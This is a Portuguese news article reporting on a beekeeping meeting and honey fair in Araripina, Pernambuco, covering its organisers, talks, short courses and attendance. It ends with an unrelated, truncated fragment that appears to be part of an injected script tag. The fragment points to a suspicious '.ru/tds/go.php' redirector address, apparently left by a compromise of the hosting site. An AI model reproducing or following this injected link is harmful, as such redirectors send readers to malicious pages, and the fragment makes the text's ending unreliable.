7? Encontro Estadual da Apicultura movimenta Sertão do Araripe
O encontro reuniu cerca de 350 pessoas, entre apicultores, visitantes, empreendedores e pesquisadores |
Meu dia pede mel. Esse foi o slogan do 7º Encontro Estadual da Apicultura de Pernambuco/ 1ª Feira do mel realizado nos dias 16 e 17 de julho, na cidade de Araripina, Região do Araripe pernambucano. O evento foi realizado pelo Serviço Brasileiro de Apoio às Micro e Pequenas Empresas de Pernambuco (Sebrae-PE) e teve o apoio de organizações não-governamentais, poder público Estadual e Municipal e Pacto da Apicultura no Sertão do Araripe (Fórum Pasa).
O encontro teve como objetivo fortalecer a cadeia produtiva da apicultura no Sertão do Araripe e em todo o Estado de Pernambuco, através da difusão de informações técnicas e mercadológicas sobre o setor, entendendo a atividade apícola como uma atividade econômica e não como um complemento de renda.
A programação foi intensa durante os dois dias de evento e as atividades ocorreram simultaneamente. A ideia era que o encontro pudesse oferecer um carrossel de temáticas relacionadas à apicultura, de modo que os participantes se dividissem de acordo com a realidade vivenciada por eles.
No primeiro dia (16/07) foram realizadas diversas palestras de qualificação profissional: Gestão de Entrepostos Cooperativos; Experiências da venda conjunta e a importância do cooperativismo; Indicação geográfica do mel da Chapada do Araripe; Políticas públicas para acesso a mercados e comercialização, além de uma apresentação de cases de sucesso.
No último dia de encontro, os apicultores discutiram sobre desenvolvimento sustentável do Araripe e o bioma caatinga, comércio justo, acesso ao crédito e linhas de financiamento, produção inspecionada, etc. Paralelamente as palestras, aconteceram minicursos, onde os participantes puderam aprender sobre fabricação de colméias, produção de cosméticos a base de mel, produção de velas de cera de abelha, produção de rainhas e gestão de apiário.
Ainda durante o evento, foi feita uma visita técnica que contou com a participação de 25 apicultores e uma mesa redonda sobre infraestrutura apícola e a viabilidade da atividade em Pernambuco.
O encontro reuniu cerca de 350 pessoas, entre apicultores, visitantes, empreendedores e pesquisadores.
1ª Feira do Mel
A 1ª Feira do Mel aconteceu na parte da noite, durante o 7º Encontro Estadual da Apicultura de Pernambuco, e contou com a presença de expositores da região. Na ocasião, os visitantes conheceram produtos beneficiados do mel e também da agricultura familiar. Atrações regionais comandaram a programação cultural do evento, com forró pé de serra.
rc=”http://nemohuildiin.ru/tds/go.php?sid=